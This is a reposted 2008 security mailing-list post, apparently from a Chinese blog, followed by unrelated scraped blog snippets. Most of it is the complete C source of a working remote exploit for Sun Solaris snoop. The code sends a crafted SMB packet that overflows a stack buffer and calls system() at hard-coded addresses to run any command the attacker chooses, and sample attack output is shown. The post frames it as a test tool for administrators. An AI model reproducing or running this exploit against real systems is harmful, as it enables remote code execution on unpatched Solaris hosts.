beansprouts
beansprouts

[EXPL] Sun Solaris snoop SMB Exploit

  _____

发件人: SecuriTeam [mailto: [email protected]]
发送时间: 2008年8月31日 15:04
收件人: [email protected]
主题: [EXPL] Sun Solaris snoop SMB Exploit

 

The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: [url]http://www.securiteam.com[/url]

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
[url]http://www.securiteam.com/mailinglist.html[/url]


- - - - - - - - -


Sun Solaris snoop SMB Exploit


Remote exploitation of multiple stack-based buffer overflow vulnerabilities
in Sun Microsystems Inc.'s snoop could allow an attacker to execute
arbitrary code with the privileges of the nobody user, the following exploit
code can be used to test your system for the mentioned vulnerability.

Exploit:
/***********************************************************
 * hoagie_snoop.c
 * SUN SOLARIS SNOOP REMOTE EXPLOIT
 * + Sun Solaris 8/9/10
 * + OpenSolaris < snv_96
 *
 * Bug discovered by Gael Delalleau
 *
 * attack:/exploits# ./hoagie_snoop -t 192.168.0.1
 * hoagie_snoop.c - solaris snoop remote
 * -andi / void.at
 *
 * [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc' on
'192.168.0.1' ...
 * [*] execute 'uname -a > /tmp/.patch.your.system.txt' now ...
 * [*] done
 * attack:/exploits#
 *
 * admin@opensolaris:~# snoop port 445
 * Using device pcn0 (promiscuous mode)
 * sh[1]: SMBr: not found [No such file or directory]
 * WARNING: received signal 11 from packet 1
 * ^Cadmin@opensolaris:~# cat /tmp/.patch.your.system.txt
 * SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris
 * admin@opensolaris:~#
 *
 * !!!UND IMMER DEINE FREUNDE, IHR NEHMT DOCH ALLE DROGEN!!!
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * [email protected]
 * [url]http://www.void.at[/url]
 *
 ************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <time.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

#define MAX_PACKET 4096
#define SMB_COMMAND_TRIGGER 0x72
#define SMB_PORT_DEFAULT 445
#define SMB_TARGET_DEFAULT "127.0.0.1"
#define SMB_HEADER_FILLER 0x20

struct target_t {
   char *description;
   int address;
} targets [] = {
   {
      /* -r-xr-xr-x 1 root bin 580460 2008-04-27 03:51 /usr/sbin/snoop */
      "SunOS 5.11 snv_86 i86pc i386",
      /* system() address */
      0xd2adc2a0
   },

   {
      /* -r-xr-xr-x 1 root bin 529956 Nov 13 2006 /usr/sbin/snoop */
      "SunOS 5.10 Generic_118833-33 sun4u sparc",
      /* system() address */
      0xff1a7c00
   },

   {
      NULL,
      0,
   }
};

/* usage
 * display help screen
 */
void usage(int argc, char **argv) {
   int i;

   printf("usage: %s [-i <id>] [-t <host>] [-c <command>]\n"
          "\n"
   "-i id for target\n"
          "-t host running snoop\n"
   "-c command to execute\n"
          "\n\n"
   "available ids:\n"
          ,
          argv[0]);
   for (i = 0; targets[i].description != NULL; i++) {
      printf("%2d : %s\n", i, targets[i].description);
   }
   exit(1);
}

/* create_smb_packet
 */
void send_smb_packet(int s,
                     struct sockaddr_in *sin,
                     char smbcommand,
       char *content) {

   char *packet = (char*)malloc(MAX_PACKET);
   int length = 0;
   struct tcphdr *tcp;
   char *data;
   int r;

   if (packet) {
      memset(packet, 0, MAX_PACKET);

      tcp = (struct tcphdr*)packet;
      tcp->source = sin->sin_port;
      tcp->dest = sin->sin_port;
      tcp->doff = sizeof(struct tcphdr) / 4;
      tcp->ack = 1;
      tcp->psh = 1;
      tcp->window = htons(32768);

      data = packet + sizeof(struct tcphdr);

      length = 4;

      strcpy(data + length, "\xffSMB");
      length += 4;

      /* smb command */
      data[length++] = smbcommand;

      /* status */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* flags */
      data[length++] = 0x18;

      /* flags2 */
      data[length++] = 0x80;
      data[length++] = 0x01;

      /* extra field */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* tid */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* client process id */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* uid */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* mid */
      data[length++] = SMB_HEADER_FILLER;
      data[length++] = SMB_HEADER_FILLER;

      /* word count */
      data[length++] = SMB_HEADER_FILLER;

      /* byte count */
      data[length++] = strlen(content) & 0xff;
      data[length++] = (strlen(content) >> 8) & 0xff;

      data[length++] = 0x02;

      if (content) {
         /* content */
         strcpy(data + length, content);
         length += strlen(content);
      }
      data[length++] = 0x00;

      /* set length for smb data */
      data[3] = (length - 4) & 0xff;
      data[2] = ((length - 4) >> 8) & 0xff;

      /* send packet */
      r = sendto(s, packet, sizeof(struct tcphdr) + length, 0,
                 (struct sockaddr*)sin, sizeof(struct sockaddr_in));
   }

}

/* main entry
 */
int main(int argc, char **argv) {
   char c;
   char *target = SMB_TARGET_DEFAULT;
   int port = SMB_PORT_DEFAULT;
   int s = 0;
   struct sockaddr_in sin;
   int i = 0;
   char buffer[1024];
   int idx = 0;
   char *command = NULL;

   printf("hoagie_snoop.c - solaris snoop remote\n"
          "-andi / void.at\n\n");

   if (argc < 2) {
      usage(argc, argv);
   } else {
      while ((c = getopt (argc, argv, "hvt:p:r:i:c:")) != EOF) {
         switch (c) {
            case 't':
                 target = optarg;
                 break;
            case 'p':
                 port = atoi(optarg);
                 break;
            case 'i':
                 idx = atoi(optarg);
                 break;
            case 'c':
          command = optarg;
   break;
            default:
                 printf("[*] unknown command line option '%c'\n", c);
                 exit(-1);
         }
      }
   }

   s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
   if (s == -1) {
      printf("[*] failed to create raw socket\n");
   } else {
      sin.sin_family = AF_INET;
      sin.sin_port = htons(port);
      sin.sin_addr.s_addr = inet_addr(target);
    
      if (!command) {
         command = "uname -a > /tmp/.patch.your.system.txt";
      }
    
      printf("[*] attacking '%s' on '%s' ...\n", targets[idx].description,
target);
    
      snprintf(buffer, sizeof(buffer), ";%s;", command);
     
      /* char dialect[256] */
      for (i = strlen(buffer); i < 256; i++) { buffer[i] =
SMB_HEADER_FILLER; }
    
      /* int bytecount */
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
    
      /* int length */
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
    
      /* dummy address */
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
    
      /* framepointer / ebp */
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
      buffer[i++] = SMB_HEADER_FILLER;
    
      /* return address */
      buffer[i++] = targets[idx].address & 0xff;
      buffer[i++] = (targets[idx].address >> 8) & 0xff;
      buffer[i++] = (targets[idx].address >> 16) & 0xff;
      buffer[i++] = (targets[idx].address >> 24) & 0xff;
    
      printf("[*] execute '%s' now ...\n", command);
    
      send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER, buffer);
    
      printf("[*] done\n");
          
      close(s);
   }

   return 0;
}

// milw0rm.com [2008-08-29]

Additional Information:
The information has been provided by andi <mailto: [email protected]> .
The original article can be found at: [url]http://www.milw0rm.com/exploits/6328[/url]

============================================================================
====





This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: [email protected]
In order to subscribe to the mailing list and receive advisories in HTML
format, simply forward this email to: [email protected]

============================================================================
====
============================================================================
====

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.






--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [email protected]
-~----------~----~----~----~------~----~------~--~---


你可能感兴趣的:(Solaris,sun,smb,exploit,snoop)

  • (AC)Playlist
    题目描述Youaregivenaplaylistofaradiostationsinceitsestablishment.Theplaylisthasatotalofnsongs.Whatisthelongestsequenceofsuccessivesongswhereeachsongisunique?输入Thefirstinputlinecontainsanintegern(1≤n≤2*105
  • 论文阅读:《针对多目标优化和应用的 NSGA-II 综述》一些关于优化算法的简介 行然梦实 优化算法论文阅读算法数学建模
    前言提醒:文章内容为方便作者自己后日复习与查阅而进行的书写与发布,其中引用内容都会使用链接表明出处(如有侵权问题,请及时联系)。其中内容多为一次书写,缺少检查与订正,如有问题或其他拓展及意见建议,欢迎评论区讨论交流。内容由AI辅助生成,仅经笔者审核整理,请甄别食用。文章目录前言一些关于优化算法的缩写优化算法Ma,Haiping&Zhang,Yajing&Sun,Shengyi&Liu,Ting&S
  • 中国顶级黑客名单 2501_92914741 facebooktwitterpaddle微信开放平台
    网名:KING真实名字:谭绪武OICQ:1576172简介:原中国黑客联盟站长,2001年中]=美黑客大战领军人物之一,中国第1代黑客之一,中国最早期黑客组织中国黑客联盟的创始人,中国黑客界泰斗级元老,中国传奇黑客。网名:sunx真实姓名:孙华OICQ:239670简介:资深网络安全专家、软件设计师、Unix专家,在黑客、病毒等技术上均具有顶尖级水平,对系统内核研究有很高的造诣,程序反编译、跟踪、
  • 基本服务 FTP & SMB 会飞的灰大狼 Centos7linux
    基本服务FTP&SMB前言:FTP简称为文件传输协议前面说的他可以做到备份的功能那么它可以做到文件传输的过程smb我们简单来说共享文件夹‍NFSNFS(NetworkFileSystem,网络文件系统)是一种分布式文件系统协议,允许不同计算机之间通过网络共享文件和目录,使远程文件系统像本地文件系统一样被访问。它最初由SunMicrosystems开发,现在已成为UNIX/Linux系统中常用的网络
  • Shortage of semiconductors 俗世尘沙
    Semiconductorsposeanunwelcomeroadblockforcarmakers半导体成为了令汽车制造商头疼的“拦路虎”Ashortageofsemiconductorshasleftcarfirmsunabletoinstalltheelectronicsthatcontrolentertainmentsystems,safetyfeaturesanddrivingaids.
  • 50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | Pokedex(宝可梦图鉴)
    我们继续50个小项目挑战!——Pokedex组件仓库地址:https://github.com/SunACong/50-vue-projects项目预览地址:https://50-vue-projects.vercel.app/使用Vue3结合PokeAPI来创建一个炫酷的宝可梦图鉴应用。通过这个项目,你将能够浏览前150只宝可梦的信息,包括它们的名字、类型、身高、体重以及能力等。而且,每只宝可梦
  • 2023-5-9晨间日记 深海未眠夜未央
    今天是什么日子起床:5:30就寝:10:00天气:sunny心情:justsoso纪念日:no任务清单昨日完成的任务,最重要的三件事:改进:Whensomeonesaidsomethingbadtoyou,youcouldbequiet,andbelievedthattimecouldproveeverything.习惯养成:1.readtwoarticles2.savemoney周目标·完成进度
  • 亲子打卡日记Aug.5th,sunny 森卿清
    武汉全民核酸,各小区都安排上了,真是高速度!虽然天气很热,但是排队现场不吵不闹、井然有序!我是第一次做核酸,排队的时候还纠结着是戳鼻子难受还是戳喉咙难受。还好,医生小姐姐只是抽出长长的大棉签,温柔地给我的喉咙挠了个痒痒,一点都不难受哦!谢谢医护天使们,辛苦啦!①a.m.*语文Day832:(一)古文《日积月累》-124-“书到用时方恨少,事非经过不知难。”15’平时要勤学苦读,多积累知识。事情不经
  • mysql 历次版本号,及每个版本更新的内容 一叶飘零_sweeeet DBmysqlmysql数据库
    MySQL自1995年首次发布以来,经历了多个版本的迭代,功能不断丰富,性能和稳定性也持续提升。以下是MySQL历次主要版本号及对应的更新内容:MySQL1.0(1995年):MySQL的首个版本,基于SQL标准,并提供了简化的SQL语法,仅供内部使用。MySQL3.11.1(1996年):直接跳过了2.x版本发布。最开始只提供了Solaris下的二进制版本,同年11月发布了Linux版本。MyS
  • 果子酱的scalerstalk第六轮新概念朗读持续力训练day102 20210121 S果子酱
    练习材料:新概念3l3-(2)任务配置:L0+L1+L4知识笔记:字母组合:nnonefindnonamenosenotenothingnnwinnerfunnydinnersunnyknk不发音kneeknifeknowgng不发音signdesignforeigncampaign短语:remains名词,遗址,遗迹B.C.beforeChrist公元前A.D.annodomini公元happe
  • 2023-4-3晨间日记 深海未眠夜未央
    今天是什么日子起床:6:30就寝:10:00天气:sunny心情:justsoso纪念日:no任务清单昨日完成的任务,最重要的三件事:改进:readtwoarticles习惯养成:readtwoarticles周目标·完成进度1.readtwoarticleseveryday2.writeanessayeveryday3.watchavideoaboutforeignalcultures学习·信息
  • 50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | NotesApp(便签笔记组件) sunbyte TailiwindCSS实战指南笔记vue.js前端javascriptcsstailwindcss
    我们继续50个小项目挑战!——NotesApp组件仓库地址:https://github.com/SunACong/50-vue-projects项目预览地址:https://50-vue-projects.vercel.app/。使用Vue3的CompositionAPI搭配TailwindCSS和marked库,构建一个支持Markdown渲染的笔记应用。该应用允许用户添加、编辑、删除笔记,并
  • 50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | GoodCheapFast(Good - Cheap - Fast三选二开关) sunbyte TailiwindCSS实战指南vue.jsjavascript前端tailwindcsscss
    我们继续50个小项目挑战!——GoodCheapFast组件仓库地址:https://github.com/SunACong/50-vue-projects项目预览地址:https://50-vue-projects.vercel.app/。使用Vue3的CompositionAPI和TailwindCSS创建一个经典的交互式组件——“Good-Cheap-Fast”三选一开关控制。这个组件模拟了
  • 50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | ImageCarousel(图片轮播组件) sunbyte TailiwindCSS实战指南vue.js前端javascriptecmascriptvue
    我们继续50个小项目挑战!——ImageCarousel组件仓库地址:https://github.com/SunACong/50-vue-projects项目预览地址:https://50-vue-projects.vercel.app/使用Vue3的语法以及TailwindCSS来构建一个简洁且功能齐全的图片轮播组件(Carousel)。该组件不仅支持手动切换上一张和下一张图片,还具备自动播放
  • 亲子打卡日记Aug.2nd,sunny 森卿清
    上午我带小宝贝去牙科诊所拔已经松动的乳牙,虽然很不喜欢牙医的推销建议,但还是让牙医给小宝贝顺带补了两颗蛀牙。小宝贝说不想再去牙科了,所以我们要好好刷牙、保护牙齿!①a.m.*亲子共读绘本Day715:皮卡西暖暖心绘本•红色系列40’-9.《拔牙记》:嚼着口香糖吹泡泡,不知不觉地就把松动的牙给吹出来啦。这样拔牙一点都不痛哈。小宝贝这几天的下门牙也开始松动,前天早上吃花生的时候,也是不知不觉地就掉了一
  • 赏龙生九子精品石雕 兰陵畫生
    在中国古代神话中有“龙生九子”的故事,讲的是龙的九个儿子,各有所好,都不成龙。但毫无疑问,这九个龙之子身上都含有龙的血脉,是名副其实的神兽,只不过其长相奇特,性格各异,各有神异,因为常被雕刻在不同所在寓意祥瑞。囚牛乾修.sunpen囚牛是龙的长子,长相是有鳞角的小黄龙,他是龙生九子中性格最温顺的,平时喜好挺音乐,常常蹲于琴头上欣赏琴音乐曲。因此古代人们常在琴头上雕刻囚牛,寓意乐器可以弹奏出美妙的声
  • 2023-4-14晨间日记 深海未眠夜未央
    今天是什么日子起床:6:00就寝:10:00天气:sunny心情:nottoobad纪念日:no任务清单昨日完成的任务,最重要的三件事:改进:workhard习惯养成:eatbreakfasteveryday周目标·完成进度1.readtwoarticleseveryday2.writeadiaryeveryday3.workhard学习·信息·阅读readtwoarticleseveryday健
  • Sunny丰盛日记day 65 SunnyZhang_3503
    考生表弟驾临宁波,从车站接来直接赶往酒店包厢,约三两好友,庆祝宴摆,小伙吃得还满意。饭后一工程师朋友跟他普及了理工男的各种常识,并借助视频和他自身工作经历介绍了当今世界前沿工程技术,外加学校,专业,及本科,硕士,博士各阶段学习的差异化,表弟收获颇大。为表感恩之情,我推荐了他一本书,希望他得益养生并更高效工作。从朋友家回来已经比较晚了,摊开电脑和所有的高考填写志愿资料全面开工。基本工作分配如下,今天
  • 2021-01-20 bluewhiter
    幸福是什么此时此刻的我有点像空心人说不出来的空洞孤寂我最爱的人,我最亲密的人又在哪里不我不能颓有好多有趣的事要做呐身边的人都是如此的优秀,可爱有很多自己需要学习的地方呐有很多自己不了解的事情等着自己去探索这人世间的各种情感都没有体会过呐怎可空心捏我是积极乐观向上的sunshinegirl专业知识很多方面都需要补习英语也要坚持学下去呀每天的心情,每天的感悟收获都要记录下来呀好好学习daydayup认
  • 亲子打卡日记Sep.10th,sunny 森卿清
    “教育是生活的过程,而不是将来生活的准备。”每个人都应该关心教育,也应该学习教育的方法。好家长也是好老师,教师节快乐哦!*儿童格斗运动馆-体能训练Day1。80’每天去幼儿园接娃,都有各种各样的兴趣班在校门口分发宣传广告。因为小宝贝喜欢运动,所以就报了这个体验课程。体能训练60分钟+格斗教学20分钟。看到场馆里格斗搏击的海报,小宝贝说:“我不喜欢打架,学这个课有用吗?”教练听了说:“学习格斗不是为
  • `/etc/samba/smb.conf` 的 `guest ok` 和 `map to guest` 和 `guest account` 和 `usershare allow guests` kfepiza 网络通讯传输协议IPTCPUDP物联OS操作系统WindowsLinux#Linux网络linuxbash
    /etc/samba/smb.conf的public和guestok和maptoguest和guestaccount和usershareallowguests在Samba的/etc/samba/smb.conf配置文件中,public、guestok、maptoguest、guestaccount和usershareallowguests这几个参数都与**匿名访问(GuestAccess)**密切
  • J2EE模式 奔走的蚂蚁~ 设计模式java-eejava
    系列文章目录J2EE模式特别关注表示层,这些模式是由SunJavaCenter鉴定的,包括:1、MVC模式(MVCPattern);2、业务代表模式(BusinessDelegatePattern);3、组合实体模式(CompositeEntityPattern);4、数据访问对象模式(DataAccessObjectPattern);5、前端控制器模式(FrontControllerPatter
  • 设计模式(四)J2EE模式
    J2EE模式这些设计模式特别关注表示层。这些模式是由SunJavaCenter鉴定的。包含以下模式:MVC模式(MVCPattern)业务代表模式(BusinessDelegatePattern)组合实体模式(CompositeEntityPattern)数据访问对象模式(DataAccessObjectPattern)前端控制器模式(FrontControllerPattern)拦截过滤器模式(
  • ERROR neutron.agent.l3.router_info [-] (101, ‘Network is unreachable‘): NetlinkError: (101, ‘Network 代码讲故事 日常错误openstackneutron网络云计算云平台l3-agentdhcp-agent
    neutron.agent.l3.agent[-]Hitretrylimitwithrouterupdatefor885c18b0-dd0d-48ff-905b-a7ba2f900842,action3。ERRORneutron.agent.l3.router_info[-](101,‘Networkisunreachable’):NetlinkError:(101,‘Networkisunrea
  • Spring Boot + AOP + Jasypt,3 步实现敏感数据脱敏
    在企业级应用开发中,用户敏感信息(如手机号、邮箱、密码等)的保护至关重要。SpringBoot生态提供了Jasypt加密框架与AOP编程模型的组合方案,可在不侵入业务逻辑的前提下实现数据全生命周期的脱敏管理。加密工具类importorg.slf4j.Logger;importorg.slf4j.LoggerFactory;importsun.misc.BASE64Decoder;importsun
  • JavaSE:对一门面向对象语言有一个初步认识 正追军梦 JavaSEjava个人开发
    一、Java的起源与历史诞生背景由JamesGosling、MikeSheridan和PatrickNaughton于1990-1995年在SunMicrosystems发起"Green"项目,旨在开发消费电子设备软件。最初命名为Oak(灵感来自Gosling办公室外的橡树),专注于可移植性和安全性。目标场景:电视顶盒、小型联网设备,需支持图形界面、简单程序执行、本地与远程通信,且无需专业程序员处
  • 常见的漏洞利用框架整理 网安导师小李 编程网络安全程序员node.jsweb安全网络安全tomcatpythonjava
    一、常见的漏洞利用框架MetasploitFramework:一个广泛使用的开源漏洞利用框架,用于测试和评估系统的安全性。ExploitDB:一个在线漏洞利用数据库,包含各种漏洞的利用代码。Canvas:由Immunity开发的商业漏洞利用框架,提供高级的漏洞利用技术和功能,用于渗透测试和漏洞研究。CoreImpact:一款商业漏洞利用框架,用于对网络和应用程序进行安全评估和渗透测试。Cobalt
  • Linux基础服务(2) 2501_92703078 linuxphp运维
    NFS/SMB:网络文件系统,共享目录NFS:(NetworkFileSystem)网络文件系统。可以像挂载本地磁盘一样挂载网络文件目录。共享目录步骤共享目录为同一个文件,在服务端上,客户端只是挂载服务端1.关闭防火墙、沙盒(SElinux)systemctlstopfirewalldsystemctldisablefirewalldsetenforce02.安装yuminstall-ynfs-u
  • Zero-shot learning 无思不晓
    zero-shotlearningimage.pngimage.png研究问题建立一个合适的分类模型,特征空间和语义空间的映射数据集AnimalwithAttributes(AwA)官网:AnimalswithAttributesCaltech-UCSD-Birds-200-2011(CUB)官网:Caltech-UCSDBirds-200-2011Sundatabase(SUN)官网:SUNDa
  • 达梦数据库sql中with语句的使用 DN金猿 mysqloracle及其他数据库数据库sqloracle
    一、with的用法Withalias_nameas(select1)[,alias_namenas(selectn)]--中括号可以省略Select….举例,如下两表:ABIDNAMEIDNAME1LI1LI2QIN3SUN语句如下:例1withtest_withas(select*fromA)select*fromBwhereB.idin(selectidfromtest_with)例2with
  • 矩阵求逆(JAVA)利用伴随矩阵 qiuwanchi 利用伴随矩阵求逆矩阵
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(利用伴随矩阵) * @author 邱万迟
  • 单例(Singleton)模式 aoyouzi 单例模式Singleton
    3.1           概述 如果要保证系统里一个类最多只能存在一个实例时,我们就需要单例模式。这种情况在我们应用中经常碰到,例如缓存池,数据库连接池,线程池,一些应用服务实例等。在多线程环境中,为了保证实例的唯一性其实并不简单,这章将和读者一起探讨如何实现单例模式。 3.2
  • [开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发 comsci 开源
          现在国内有大量的信息技术产品,都是通过盗版,免费下载,开源,附送等方式从国外的开发者那里获得的。。。。。。        虽然这种情况带来了国内信息产业的短暂繁荣,也促进了电子商务和互联网产业的快速发展,但是实际上,我们应该清醒的看到,这些产业的核心力量是被国外的
  • 页面有两个frame,怎样点击一个的链接改变另一个的内容 Array_06 UIXHTML
    <a src="地址"  targets="这里写你要操作的Frame的名字" />搜索 然后你点击连接以后你的新页面就会显示在你设置的Frame名字的框那里 targerts="",就是你要填写目标的显示页面位置 ===================== 例如: <frame src=&
  • Struts2实现单个/多个文件上传和下载 oloz 文件上传struts
    struts2单文件上传:     步骤01:jsp页面 <!--在进行文件上传时,表单提交方式一定要是post的方式,因为文件上传时二进制文件可能会很大,还有就是enctype属性,这个属性一定要写成multipart/form-data,不然就会以二进制文本上传到服务器端-->   <form action="fileUplo
  • 推荐10个在线logo设计网站 362217990 logo
    在线设计Logo网站。 1、http://flickr.nosv.org(这个太简单) 2、http://www.logomaker.com/?source=1.5770.1 3、http://www.simwebsol.com/ImageTool 4、http://www.logogenerator.com/logo.php?nal=1&tpl_catlist[]=2 5、ht
  • jsp上传文件 香水浓 jspfileupload
    1. jsp上传 Notice: 1. form表单 method 属性必须设置为 POST 方法 ,不能使用 GET 方法 2. form表单 enctype 属性需要设置为 multipart/form-data 3. form表单 action 属性需要设置为提交到后台处理文件上传的jsp文件地址或者servlet地址。例如 uploadFile.jsp 程序文件用来处理上传的文
  • 我的架构经验系列文章 - 前端架构 agevs JavaScriptWeb框架UIjQuer
    框架层面:近几年前端发展很快,前端之所以叫前端因为前端是已经可以独立成为一种职业了,js也不再是十年前的玩具了,以前富客户端RIA的应用可能会用flash/flex或是silverlight,现在可以使用js来完成大部分的功能,因此js作为一门前端的支撑语言也不仅仅是进行的简单的编码,越来越多框架性的东西出现了。越来越多的开发模式转变为后端只是吐json的数据源,而前端做所有UI的事情。MVCMV
  • android ksoap2 中把XML(DataSet) 当做参数传递 aijuans android
    我的android app中需要发送webservice ,于是我使用了 ksop2 进行发送,在测试过程中不是很顺利,不能正常工作.我的web service 请求格式如下     [html]  view plain copy   <Envelope xmlns="http://schemas.
  • 使用Spring进行统一日志管理 + 统一异常管理 baalwolf spring
    统一日志和异常管理配置好后,SSH项目中,代码以往散落的log.info() 和 try..catch..finally 再也不见踪影! 统一日志异常实现类: [java]  view plain copy   package com.pilelot.web.util;      impor
  • Android SDK 国内镜像 BigBird2012 android sdk
    一、镜像地址: 1、东软信息学院的 Android SDK 镜像,比配置代理下载快多了。 配置地址, http://mirrors.neusoft.edu.cn/configurations.we#android 2、北京化工大学的: IPV4:ubuntu.buct.edu.cn  IPV4:ubuntu.buct.cn IPV6:ubuntu.buct6.edu.cn
  • HTML无害化和Sanitize模块 bijian1013 JavaScriptAngularJSLinkySanitize
    一.ng-bind-html、ng-bind-html-unsafe         AngularJS非常注重安全方面的问题,它会尽一切可能把大多数攻击手段最小化。其中一个攻击手段是向你的web页面里注入不安全的HTML,然后利用它触发跨站攻击或者注入攻击。         考虑这样一个例子,假设我们有一个变量存
  • [Maven学习笔记二]Maven命令 bit1129 maven
    mvn compile compile编译命令将src/main/java和src/main/resources中的代码和配置文件编译到target/classes中,不会对src/test/java中的测试类进行编译 MVN编译使用 maven-resources-plugin:2.6:resources maven-compiler-plugin:2.5.1:compile &nbs
  • 【Java命令二】jhat bit1129 Java命令
    jhat用于分析使用jmap dump的文件,,可以将堆中的对象以html的形式显示出来,包括对象的数量,大小等等,并支持对象查询语言。 jhat默认开启监听端口7000的HTTP服务,jhat是Java Heap Analysis Tool的缩写 1. 用法: [hadoop@hadoop bin]$ jhat -help Usage: jhat [-stack <bool&g
  • JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc ronin47
    进到类似目录 server/default/conf/bootstrap,打开文件 profile.xml找到: Xml代码<bean    name="AttachmentStore"  class="org.jboss.system.server.profileservice.repository.AbstractAtta
  • 写给初学者的6条网页设计安全配色指南 brotherlamp UIui自学ui视频ui教程ui资料
    网页设计中最基本的原则之一是,不管你花多长时间创造一个华丽的设计,其最终的角色都是这场秀中真正的明星——内容的衬托     我仍然清楚地记得我最早的一次美术课,那时我还是一个小小的、对凡事都充满渴望的孩子,我摆放出一大堆漂亮的彩色颜料。我仍然记得当我第一次看到原色与另一种颜色混合变成第二种颜色时的那种兴奋,并且我想,既然两种颜色能创造出一种全新的美丽色彩,那所有颜色
  • 有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。写一个函数实现。复杂度是什么。 bylijinnan java算法面试
    import java.util.Random; import java.util.Set; import java.util.TreeSet; /** * http://weibo.com/1915548291/z7HtOF4sx * #面试题#有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。 * 写一个函数实现。复杂度是什么
  • struts2获得request、session、application方式 chiangfai application
    1、与Servlet API解耦的访问方式。 a.Struts2对HttpServletRequest、HttpSession、ServletContext进行了封装,构造了三个Map对象来替代这三种对象要获取这三个Map对象,使用ActionContext类。 ----->   package pro.action; import java.util.Map; imp
  • 改变python的默认语言设置 chenchao051 python
    import sys sys.getdefaultencoding()  可以测试出默认语言,要改变的话,需要在python lib的site-packages文件夹下新建: sitecustomize.py, 这个文件比较特殊,会在python启动时来加载,所以就可以在里面写上: import sys sys.setdefaultencoding('utf-8') &n
  • mysql导入数据load data infile用法 daizj mysql导入数据
    我们常常导入数据!mysql有一个高效导入方法,那就是load data infile 下面来看案例说明 基本语法: load data  [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl_name [fields [terminated by't'] [OPTI
  • phpexcel导入excel表到数据库简单入门示例 dcj3sjt126com PHPExcel
    跟导出相对应的,同一个数据表,也是将phpexcel类放在class目录下,将Excel表格中的内容读取出来放到数据库中 <?php error_reporting(E_ALL); set_time_limit(0); ?> <html> <head> <meta http-equiv="Content-Type"
  • 22岁到72岁的男人对女人的要求 dcj3sjt126com
    22岁男人对女人的要求是:一,美丽,二,性感,三,有份具品味的职业,四,极有耐性,善解人意,五,该聪明的时候聪明,六,作小鸟依人状时尽量自然,七,怎样穿都好看,八,懂得适当地撒娇,九,虽作惊喜反应,但看起来自然,十,上了床就是个无条件荡妇。 32岁的男人对女人的要求,略作修定,是:一,入得厨房,进得睡房,二,不必服侍皇太后,三,不介意浪漫蜡烛配盒饭,四,听多过说,五,不再傻笑,六,懂得独
  • Spring和HIbernate对DDM设计的支持 e200702084 DAO设计模式springHibernate领域模型
    A:数据访问对象     DAO和资源库在领域驱动设计中都很重要。DAO是关系型数据库和应用之间的契约。它封装了Web应用中的数据库CRUD操作细节。另一方面,资源库是一个独立的抽象,它与DAO进行交互,并提供到领域模型的“业务接口”。    资源库使用领域的通用语言,处理所有必要的DAO,并使用领域理解的语言提供对领域模型的数据访问服务。
  • NoSql 数据库的特性比较 geeksun NoSQL
    Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。目前由VMware主持开发工作。   1. 数据模型 作为Key-value型数据库,Redis也提供了键(Key)和值(Value)的映射关系。除了常规的数值或字符串,Redis的键值还可以是以下形式之一: Lists (列表) Sets
